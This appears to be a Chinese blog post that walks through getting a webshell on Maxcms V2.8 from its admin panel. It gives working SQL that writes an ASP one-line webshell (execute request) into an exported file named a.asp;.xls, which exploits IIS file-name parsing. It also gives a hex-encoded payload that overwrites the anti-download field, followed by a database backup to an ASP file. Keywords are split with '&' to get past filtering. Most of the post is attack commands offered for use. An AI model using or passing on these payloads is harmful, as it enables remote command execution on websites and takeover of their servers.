由于本人网站所在服务器会过滤某些关键字，过滤成****，所以这里的某些字符我给替换一下，你们懂的！请去掉&就可以了。
程序版本为Maxcms V2.8，而网络上有的获取 shell 版本在2.5。2.5中大部分方法都已经不行。
后台有个 SQL高级助手，于是立刻想到两种思路。第一是通过Access导出a.asp;.Xls的方式。另一种是一句话直接写入数据库，将其备份为asp程序执行。
第一种方法比较好实现。如下语句就可以办到。
create table a (a v&a&r&c&h&a&r(50))
insert into a (a) values ('<%e&x&e&cute request("value")%>')
select * into [a] in 'D:\web\a.asp;.xls' 'excel 4.0;' from a
独自等待补充：
SELECT '<%e&x&e&cute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

其实使用这一句话就可以的，但是前提是表a是存在的，原作者的是可以成功的，这里只是多给一种方法。
第二种方式是采用将一句话写入数据库。备份出来，但由于数据库中存在着防下载表。就算写进了数据库也不一定爆得出源码，于是在SQL高级助手处使用如下语句。
update XXXX set notdown=0x3C2565786563757465287265717565737428226C222929253E
原理就不多说了。自己百度，这样/inc/datas.asp就能爆出代码。
通过后台 → 模板 → 自定义标签处往数据库中写入一句话，然后从后台将数据库备份成asp文件

关健词：Maxcms